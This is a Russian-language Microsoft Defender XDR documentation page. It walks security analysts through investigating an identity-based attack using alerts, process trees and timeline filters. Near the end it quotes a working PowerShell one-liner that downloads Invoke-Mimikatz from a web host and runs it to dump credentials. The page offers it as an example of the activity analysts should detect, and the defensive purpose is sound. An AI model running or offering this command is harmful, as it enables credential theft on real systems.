Пример атаки на основе удостоверений
Область применения:
- Microsoft Defender XDR
Microsoft Defender для удостоверений помогает обнаруживать вредоносные попытки компрометации удостоверений в организации. Так как Defender для удостоверений интегрируется с Microsoft Defender XDR, аналитики безопасности могут видеть угрозы, поступающие из Defender для удостоверений, такие как предполагаемые попытки повышения привилегий Netlogon.
Анализ атаки в Microsoft Defender для удостоверений
Microsoft Defender XDR позволяет аналитикам фильтровать оповещения по источнику обнаружения на вкладке Оповещения на странице инцидентов. В следующем примере источник обнаружения фильтруется в Defender для удостоверений.
Если выбрать оповещение о предполагаемой атаке overpass-the-hash, вы перейдете на страницу в Microsoft Defender for Cloud Apps, где отображаются более подробные сведения. Вы всегда можете узнать больше об оповещении или атаке, выбрав Дополнительные сведения об этом типе оповещения , чтобы прочитать описание атаки и предложения по исправлению.
Исследование той же атаки в Microsoft Defender для конечной точки
Кроме того, аналитик может использовать Defender для конечной точки, чтобы узнать больше о действиях в конечной точке. Выберите инцидент из очереди инцидентов, а затем перейдите на вкладку Оповещения . Здесь они также могут определить источник обнаружения. Источник обнаружения, помеченный как EDR, означает обнаружение и ответ конечной точки, который является Defender для конечной точки. Здесь аналитик выбирает оповещение, обнаруженное EDR.
На странице оповещения отображаются различные соответствующие сведения, такие как имя затронутого устройства, имя пользователя, состояние автоматического исследования и сведения об оповещении. В истории оповещений представлено визуальное представление дерева процессов. Дерево процессов представляет собой иерархическое представление родительских и дочерних процессов, связанных с оповещением.
Каждый процесс можно развернуть для просмотра дополнительных сведений. Сведения, которые могут видеть аналитик, — это фактические команды, которые были введены в рамках вредоносного сценария, IP-адреса исходящих подключений и другие полезные сведения.
Выбрав Просмотреть в временная шкала, аналитик может еще больше детализировать, чтобы определить точное время компрометации.
Microsoft Defender для конечной точки может обнаруживать множество вредоносных файлов и скриптов. Однако из-за многих допустимых вариантов использования исходящих подключений, PowerShell и действий командной строки некоторые действия будут считаться безопасными, пока не создайте вредоносный файл или действие. Таким образом, использование временная шкала помогает аналитикам поместить оповещение в контекст с окружающим действием, чтобы определить исходный источник или время атаки, которая в противном случае скрыта обычной файловой системой и действиями пользователей.
Чтобы использовать временная шкала, аналитик начинается с обнаружения оповещений (красным цветом) и прокрутит вниз назад, чтобы определить, когда на самом деле началось исходное действие, которое привело к вредоносной активности.
Важно понимать и различать распространенные действия, такие как клиентский компонент Центра обновления Windows подключения, трафик активации доверенного программного обеспечения Windows, другие распространенные подключения к сайтам Майкрософт, сторонние действия в Интернете, действия конечной точки Майкрософт Configuration Manager и другие неопасные действия от подозрительных Деятельности. Одним из способов отличия является использование временная шкала фильтров. Существует множество фильтров, которые могут выделять определенные действия, отфильтровав все, что аналитик не хочет просматривать.
На рисунке ниже аналитик отфильтрован для просмотра только сетевых и технологических событий. Эти критерии фильтра позволяют аналитику видеть сетевые подключения и процессы, связанные с событием, в котором Блокнот установил подключение с IP-адресом, что мы также видели в дереве процессов.
В этом конкретном случае Блокнот использовался для создания вредоносного исходящего подключения. Однако часто злоумышленники используют iexplorer.exe для установки подключений для загрузки вредоносных полезных данных, так как обычно iexplorer.exe процессы считаются обычной активностью веб-браузера.
Еще одним элементом, который следует искать в временная шкала, будет использование PowerShell для исходящих подключений. Аналитик будет искать успешные подключения PowerShell с помощью таких команд, как IEX (New-Object Net.Webclient)
исходящие подключения к веб-сайту, на котором размещен вредоносный файл.
В следующем примере PowerShell использовался для скачивания и выполнения Mimikatz с веб-сайта:
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds
Аналитик может быстро искать ключевые слова, введя ключевое слово в строке поиска, чтобы отобразить только события, созданные с помощью PowerShell.
Следующее действие
См. путь исследования фишинга .
См. также
Совет
Хотите узнать больше? Engage с сообществом Microsoft Security в нашем техническом сообществе: Microsoft Defender XDR Техническое сообщество.
Обратная связь
https://aka.ms/ContentUserFeedback.
Ожидается в ближайшее время: в течение 2024 года мы постепенно откажемся от GitHub Issues как механизма обратной связи для контента и заменим его новой системой обратной связи. Дополнительные сведения см. в разделеОтправить и просмотреть отзыв по